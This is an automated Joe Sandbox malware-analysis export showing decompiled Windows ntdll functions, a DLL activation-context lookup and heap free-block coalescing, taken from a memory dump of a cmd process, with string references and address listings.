Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 0-2586055223
Opcode ID: 92a0b270dc94696523a03d79b342fa93af6585f0bb070db61e131eae7c3be651
Instruction ID: db4560e5beb21ed0a9a93f5dcd516194fae97b032e76ead7c01ced7ddc7abd78
Opcode Fuzzy Hash: 92a0b270dc94696523a03d79b342fa93af6585f0bb070db61e131eae7c3be651
Instruction Fuzzy Hash: 7751F3322167809FD322EBA8C849F77B7E8FF85B50F080468F9559B292D724D805CB66

Uniqueness

Uniqueness Score: -1.00%

Function 036F8E00 Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E036F8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x37bd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x37b8464; // 0x761c0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x37b5780 & 0x00000003) != 0) {
							E03745510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x37b5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0370B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x37b7984; // 0x2f12c28
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x37b8464; // 0x761c0110
					 *0x37bb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E036F9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x37b5780 & 0x00000005) != 0) {
						_push(_t49);
						E03745510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x036f8e0f
0x036f8e16
0x036f8e19
0x036f8e1b
0x036f8e21
0x036f8e7f
0x036f8e85
0x03739354
0x0373936c
0x03739371
0x0373937b
0x03739381
0x03739381
0x0373937b
0x036f8e9d
0x036f8e9d
0x036f8e29
0x036f8e2c
0x036f8e38
0x036f8e3e
0x036f8e43
0x036f8eb5
0x036f8eb9
0x037392aa
0x037392af
0x037392e8
0x037392e8
0x037392af
0x036f8eb9
0x036f8e45
0x036f8e53
0x036f8e5b
0x036f8e5f
0x036f8e78
0x036f8e78
0x036f8e7d
0x036f8ec3
0x036f8ecd
0x036f8ed2
0x036f8ed2
0x036f8ec5
0x036f8ec5
0x00000000
0x036f8e7d
0x036f8e67
0x036f8ea4
0x0373931a
0x00000000
0x00000000
0x03739320
0x036f8ea4
0x036f8e70
0x03739325
0x03739340
0x03739345
0x03739345
0x036f8e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 0373933B, 03739367
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0373932A
Querying the active activation context failed with status 0x%08lx, xrefs: 03739357
LdrpFindDllActivationContext, xrefs: 03739331, 0373935D

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: b7b9edc028c2d057f812bee79d84f84bbe85c39aaafcdff134a714663128c618
Instruction ID: c92ef2cd1cdc72182fb8f4eb0d75ebd59cc4b4cadb0409d89f228a84aba0951a
Opcode Fuzzy Hash: b7b9edc028c2d057f812bee79d84f84bbe85c39aaafcdff134a714663128c618
Instruction Fuzzy Hash: 7A412A32B003159FDB35EA18CD4DB79B6B9BB4625CF0D81E9DB1457252E770AC80C683

Uniqueness

Uniqueness Score: -1.00%

Function 037849A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 03784A4A, 03784A5D, 03784A5F, 03784AC4
This is located in the %s field of the heap header., xrefs: 03784AD6
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 03784A61
HEAP[%wZ]: , xrefs: 03784A3D, 03784AB7

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-336120773
Opcode ID: f650042272ec904466aee066bb0524d77ea1f4f387a184e66a5e14a1b80c5ee5
Instruction ID: bf55a16b6eaac147ad64413dab468ccdec85f35f5bc27c21d8afcbab2021adb8
Opcode Fuzzy Hash: f650042272ec904466aee066bb0524d77ea1f4f387a184e66a5e14a1b80c5ee5
Instruction Fuzzy Hash: 91310335250651EFC320EB59C8C6FAAB7ECEF05720F184159F4168F251E6B4A844CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 036E99BF Relevance: 4.3, Strings: 3, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E036E99BF(void* __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				void* _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E0377FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E0378A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E0371D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E036CB150();
										} else {
											E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E036CB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x37b6378 = 1;
											asm("int3");
											 *0x37b6378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E036EA229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								L036EA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E036EBC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E0378A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E036EA229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								L036EA309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E0371D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E036CB150();
								} else {
									E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E036CB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x37b6378 = 1;
									asm("int3");
									 *0x37b6378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E0377FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E0378A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E0371D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E036CB150();
													} else {
														E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E036CB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x37b6378 = 1;
														asm("int3");
														 *0x37b6378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E036EA229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										L036EA309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E036EBC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E0378A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E0371D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E036CB150();
													} else {
														E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E036CB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x37b6378 = 1;
														asm("int3");
														 *0x37b6378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E036EA229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										L036EA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E036EBC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E036EBC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}

0x036e99ca
0x036e99cc
0x036e99df
0x036e99e3
0x036e99f8
0x036e99fb
0x036e99fb
0x00000000
0x036e9a48
0x036e9a48
0x036e9a4c
0x036e9a51
0x036e9a55
0x036e9a61
0x036e9a66
0x036e9a68
0x03731457
0x0373145c
0x0373145c
0x036e9a68
0x036e9a6e
0x036e9a71
0x036e9a74
0x036e9a76
0x03731466
0x03731469
0x03731469
0x0373146c
0x0373146e
0x03731471
0x03731474
0x03731477
0x03731479
0x0373159c
0x0373159c
0x0373159d
0x037315a6
0x037315ab
0x037315ab
0x00000000
0x037315ab
0x0373147f
0x03731481
0x00000000
0x00000000
0x0373148a
0x0373148d
0x03731493
0x03731495
0x037314c0
0x037314c0
0x037314c3
0x037314c6
0x037314c8
0x037314cb
0x037314cf
0x037314f2
0x037314f2
0x037314f5
0x037314f8
0x03731501
0x03731508
0x0373150b
0x0373150e
0x03731510
0x03731513
0x03731515
0x03731515
0x03731518
0x03731518
0x03731513
0x03731521
0x03731525
0x0373152a
0x0373152d
0x03731530
0x03731532
0x03731539
0x0373153d
0x0373155d
0x03731562
0x0373153f
0x03731555
0x0373155a
0x03731570
0x03731577
0x0373157c
0x03731582
0x03731585
0x03731589
0x0373158b
0x03731592
0x03731593
0x03731593
0x03731589
0x03731530
0x00000000
0x037314f8
0x037314d5
0x037314da
0x037314dc
0x00000000
0x037314de
0x037314e8
0x00000000
0x037314e8
0x03731497
0x03731497
0x037314a4
0x037314a4
0x037314a7
0x037314a9
0x037314ab
0x037314ab
0x0373149c
0x0373149e
0x037314a0
0x037314b0
0x037314b0
0x00000000
0x037314a2
0x037314a2
0x00000000
0x037314a2
0x037314a0
0x037314b3
0x037314bb
0x00000000
0x037314bb
0x03731495
0x036e9a7c
0x036e9a7c
0x036e9a7f
0x036e9a7f
0x036e9a82
0x036e9a84
0x036e9a87
0x036e9a8a
0x036e9a8d
0x036e9a8f
0x0373166a
0x0373166a
0x0373166b
0x03731674
0x00000000
0x03731674
0x036e9a95
0x036e9a97
0x00000000
0x00000000
0x036e9aa0
0x036e9aa3
0x036e9aa9
0x036e9aab
0x036e9ad7
0x036e9ad7
0x036e9ada
0x036e9add
0x036e9adf
0x036e9ae2
0x036e9ae6
0x036e9b22
0x036e9b27
0x036e9b29
0x00000000
0x036e9b2b
0x037315be
0x00000000
0x037315be
0x036e9b29
0x036e9ae8
0x036e9ae8
0x036e9aeb
0x036e9aee
0x037315cb
0x037315d2
0x037315d5
0x037315d7
0x037315da
0x037315dc
0x037315dc
0x037315dc
0x037315da
0x037315e5
0x037315e9
0x037315ee
0x037315f1
0x037315f3
0x037315f9
0x03731600
0x03731604
0x03731624
0x03731629
0x03731606
0x0373161c
0x03731621
0x03731637
0x0373163e
0x03731643
0x03731649
0x0373164c
0x03731650
0x03731656
0x0373165d
0x0373165e
0x0373165e
0x03731650
0x037315f3
0x036e9af4
0x036e9af7
0x036e9afc
0x036e9b00
0x036e9b04
0x036e9b08
0x036e9b14
0x036e99fe
0x036e9a04
0x036e9a07
0x00000000
0x036e9a29
0x0373169c
0x037316a0
0x037316a5
0x037316a9
0x037316b5
0x037316ba
0x037316bc
0x037316be
0x037316c3
0x037316c3
0x037316bc
0x037316c8
0x037316cc
0x0373181b
0x0373181b
0x0373181e
0x0373181e
0x03731821
0x03731823
0x03731826
0x03731829
0x0373182c
0x0373182e
0x03731688
0x03731688
0x03731689
0x0373168b
0x0373168c
0x0373168d
0x0373168f
0x03731692
0x00000000
0x03731692
0x03731834
0x03731836
0x00000000
0x00000000
0x0373183f
0x03731842
0x03731848
0x0373184a
0x03731875
0x03731875
0x03731878
0x0373187b
0x0373187d
0x03731880
0x03731884
0x037318a7
0x037318a7
0x037318aa
0x037318ad
0x037318b6
0x037318bd
0x037318c0
0x037318c3
0x037318c5
0x037318c8
0x037318ca
0x037318ca
0x037318cd
0x037318cd
0x037318c8
0x037318d5
0x037318da
0x037318df
0x037318e2
0x037318e5
0x037318e7
0x037318ee
0x037318f2
0x03731912
0x03731917
0x037318f4
0x0373190a
0x0373190f
0x03731925
0x0373192c
0x03731931
0x0373193a
0x0373193e
0x03731940
0x03731947
0x03731948
0x03731948
0x0373193e
0x037318e5
0x0373194f
0x03731952
0x03731956
0x0373195d
0x03731961
0x0373196d
0x00000000
0x0373196d
0x0373188a
0x0373188f
0x03731891
0x00000000
0x00000000
0x0373189d
0x00000000
0x0373189d
0x0373184c
0x03731859
0x03731859
0x0373185c
0x00000000
0x00000000
0x03731851
0x03731853
0x03731855
0x03731865
0x03731865
0x03731866
0x03731868
0x03731870
0x00000000
0x03731870
0x03731857
0x03731857
0x0373185e
0x00000000
0x037316d2
0x037316d2
0x037316d5
0x037316d5
0x037316d8
0x037316da
0x037316dd
0x037316e0
0x037316e3
0x037316e5
0x03731808
0x03731808
0x03731809
0x03731812
0x03731817
0x03731817
0x00000000
0x03731817
0x037316eb
0x037316ed
0x00000000
0x00000000
0x037316f6
0x037316f9
0x037316ff
0x03731701
0x0373172c
0x0373172c
0x0373172f
0x03731732
0x03731734
0x03731737
0x0373173b
0x0373175e
0x0373175e
0x03731761
0x03731764
0x0373176d
0x03731774
0x03731777
0x0373177a
0x0373177c
0x0373177f
0x03731781
0x03731781
0x03731784
0x03731784
0x0373177f
0x0373178c
0x03731791
0x03731796
0x03731799
0x0373179c
0x0373179e
0x037317a5
0x037317a9
0x037317c9
0x037317ce
0x037317ab
0x037317c1
0x037317c6
0x037317dc
0x037317e3
0x037317e8
0x037317ee
0x037317f1
0x037317f5
0x037317f7
0x037317fe
0x037317ff
0x037317ff
0x037317f5
0x0373179c
0x00000000
0x03731764
0x03731741
0x03731746
0x03731748
0x00000000
0x00000000
0x03731754
0x00000000
0x03731754
0x03731703
0x03731710
0x03731710
0x03731713
0x00000000
